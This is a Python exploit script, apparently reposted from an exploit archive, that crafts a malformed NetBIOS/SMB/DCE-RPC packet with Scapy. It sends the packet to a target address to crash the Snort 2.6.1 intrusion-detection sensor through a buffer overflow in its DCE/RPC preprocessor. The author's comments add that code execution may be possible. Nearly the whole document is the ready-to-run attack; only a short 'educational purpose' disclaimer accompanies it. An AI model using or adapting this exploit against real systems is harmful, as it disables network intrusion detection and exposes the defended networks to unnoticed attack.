Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit

                                                #!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)
# 
#&nbsp;Author:&nbsp;Trirat&nbsp;Puttaraksa&nbsp;<trir00t&nbsp;[at]&nbsp;gmail.com>
#
#&nbsp;http://sf-freedom.blogspot.com
#
######################################################
#&nbsp;For&nbsp;educational&nbsp;purpose&nbsp;only
#
#&nbsp;This&nbsp;exploit&nbsp;just&nbsp;crash&nbsp;Snort&nbsp;2.6.1&nbsp;on&nbsp;Fedora&nbsp;Core&nbsp;4.&nbsp;However,&nbsp;Code&nbsp;Execution
#&nbsp;may&nbsp;be&nbsp;possible,&nbsp;but&nbsp;I&nbsp;have&nbsp;no&nbsp;time&nbsp;to&nbsp;make&nbsp;it&nbsp;:(&nbsp;
#&nbsp;I&nbsp;will&nbsp;post&nbsp;the&nbsp;information&nbsp;about&nbsp;this&nbsp;vulnerability&nbsp;in&nbsp;my&nbsp;blog&nbsp;soon
#
#&nbsp;Note:&nbsp;this&nbsp;exploit&nbsp;use&nbsp;Scapy&nbsp;(http://www.secdev.org/projects/scapy/)&nbsp;
#&nbsp;to&nbsp;inject&nbsp;the&nbsp;packet,&nbsp;so&nbsp;you&nbsp;have&nbsp;to&nbsp;install&nbsp;Scapy&nbsp;before&nbsp;use&nbsp;it.
#
#######################################################

import&nbsp;sys
from&nbsp;scapy&nbsp;import&nbsp;*
from&nbsp;struct&nbsp;import&nbsp;pack
conf.verb&nbsp;=&nbsp;0

#&nbsp;NetBIOS&nbsp;Session&nbsp;Service
payload&nbsp;=&nbsp;\"x00x00x01xa6\"

#&nbsp;SMB&nbsp;Header
payload&nbsp;+=&nbsp;\"xffx53x4dx42x75x00x00x00x00x18x07xc8x00x00\"
payload&nbsp;+=&nbsp;\"x00x00x00x00x00x00x00x00x00x00x00x00xffxfe\"
payload&nbsp;+=&nbsp;\"x00x08x30x00\"

#&nbsp;Tree&nbsp;Connect&nbsp;AndX&nbsp;Request
payload&nbsp;+=&nbsp;\"x04xa2x00x52x00x08x00x01x00x27x00x00\"
payload&nbsp;+=&nbsp;\"x5cx00x5cx00x49x00x4ex00x53x00x2dx00x4bx00x49x00\"
payload&nbsp;+=&nbsp;\"x52x00x41x00x5cx00x49x00x50x00x43x00x24x00x00x00\"
payload&nbsp;+=&nbsp;\"x3fx3fx3fx3fx3fx00\"

#&nbsp;NT&nbsp;Create&nbsp;AndX&nbsp;Request
payload&nbsp;+=&nbsp;\"x18x2fx00x96x00x00x0ex00x16x00x00x00x00x00x00x00\"
payload&nbsp;+=&nbsp;\"x9fx01x02x00x00x00x00x00x00x00x00x00x00x00x00x00\"
payload&nbsp;+=&nbsp;\"x03x00x00x00x01x00x00x00x40x00x40x00x02x00x00x00\"
payload&nbsp;+=&nbsp;\"x01x11x00x00x5cx00x73x00x72x00x76x00x73x00x76x00\"
payload&nbsp;+=&nbsp;\"x63x00x00x00\"

#&nbsp;Write&nbsp;AndX&nbsp;Request&nbsp;#1
payload&nbsp;+=&nbsp;\"x0ex2fx00xfex00x00x40x00x00x00x00xffxffxffxffx80\"
payload&nbsp;+=&nbsp;\"x00x48x00x00x00x48x00xb6x00x00x00x00x00x49x00xee\"

payload&nbsp;+=&nbsp;\"x05x00x0bx03x10x00x00x00xffx01x00x00x01x00x00x00\"
payload&nbsp;+=&nbsp;\"xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00\"
payload&nbsp;+=&nbsp;\"xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88\"
payload&nbsp;+=&nbsp;\"x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00\"
payload&nbsp;+=&nbsp;\"x2bx10x48x60x02x00x00x00\"

#&nbsp;Write&nbsp;AndX&nbsp;Request&nbsp;#2
payload&nbsp;+=&nbsp;\"x0exffx00xdexdex00x40x00x00x00x00xffxffxffxffx80\"
payload&nbsp;+=&nbsp;\"x00x48x00x00x00xffx01x30x01x00x00x00x00x49x00xee\"

payload&nbsp;+=&nbsp;\"x05x00x0bx03x10x00x00x00x48x00x00x00x01x00x00x00\"
payload&nbsp;+=&nbsp;\"xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00\"
payload&nbsp;+=&nbsp;\"xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88\"
payload&nbsp;+=&nbsp;\"x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00\"
payload&nbsp;+=&nbsp;\"x2bx10x48x60x02x00x00x00\"

if&nbsp;len(sys.argv)&nbsp;!=&nbsp;2:
	print&nbsp;\"Usage&nbsp;snort_dos_dcerpc.py&nbsp;<fake&nbsp;destination&nbsp;ip>\"
	sys.exit(1)

target&nbsp;=&nbsp;sys.argv[1]

p&nbsp;=&nbsp;IP(dst=target)&nbsp;/&nbsp;TCP(sport=1025,&nbsp;dport=139,&nbsp;flags=\"PA\")&nbsp;/&nbsp;payload
send(p)

&nbsp;